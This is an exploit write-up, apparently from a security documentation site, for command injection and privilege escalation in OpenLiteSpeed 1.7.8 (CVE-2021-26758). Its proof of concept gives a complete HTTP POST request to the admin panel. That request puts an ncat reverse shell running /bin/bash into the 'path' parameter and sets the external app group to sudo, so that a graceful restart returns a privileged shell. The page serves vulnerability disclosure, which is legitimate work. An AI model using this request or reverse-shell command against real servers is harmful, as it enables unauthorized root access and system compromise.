> For the complete documentation index, see [llms.txt](https://docs.unsafe-inline.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.unsafe-inline.com/0day/openlitespeed-web-server-1.7.8-command-injection-to-privilege-escalation-cve-2021-26758.md).

# Openlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)

### # Description

OpenLiteSpeed web server version 1.7.8 allows attackers to gain root terminal access and execute commands on the host system. The `path` parameter has command injection vulnerability that leads to escalate privilege. OpenLiteSpeed (1.7.8) web server runs with `user(nobody):group(nogroup)` privilege. However, `extUser` and `extGroup` parameters could be used to join a group (GID) such as shadow, sudo, etc.

&#x20;I found a way to escalate privileges on Ubuntu 18.04 via OpenLiteSpeed web server that runs with *`user(nobody):group(nogroup)`* privilege . According to this vulnerability , system user that has admin panel credentials can add himself to sudo group or shadow group( to read /etc/shadow file) . So that the user can execute command with high privileges.

Command injection vulnerability is discovered by *`cmOs - SunCSR`*

### # Proof of Concept

* Assuming that there is a test user that is not member of sudo group.

![](/files/-MXbb5TYl4VZfPKqe_cZ)

* User changes External App configuration as following to get reverse shell with high privileges.

![](/files/-MXbbm5XGzUFP8kn5ydy)

![](/files/-MXbbtzZGFk8eCbm5ZbX)

```
(POST) HTTP Request:

POST /view/confMgr.php HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost:7080/index.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 609
Origin: https://localhost:7080
Connection: close
Cookie: litespeed_admin_lang=english; LSUI37FE0C43B84483E0=05850662073b74332d87ffa206abe963; LSID37FE0C43B84483E0=YUSipPp8emA%3D; LSPA37FE0C43B84483E0=pmN9JUxkJwg%3D

name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M%0D%0ASHELL%3D%2Fbin%2Fbash%0D%0APATH%3D%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=0&autoStart=2&path=%2Fusr%2Fbin%2Fncat+-nv+127.0.0.1+8081+-e+%2Fbin%2Fbash&backlog=100&instances=1&extUser=test&extGroup=sudo&umask=&runOnStartUp=1&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.60985900+1612100858
```

* The user sends a *Graceful Restart* request through admin panel and get reverse shell with sudo group privileges.

![](/files/-MXbetE-Cd9vM26Ht8H5)

{% embed url="<https://www.exploit-db.com/exploits/49556>" %}

<pre><code><strong># Author: Metin Yunus Kandemir
</strong></code></pre>

{% embed url="<https://youtu.be/PfhzisM6lhQ>" %}
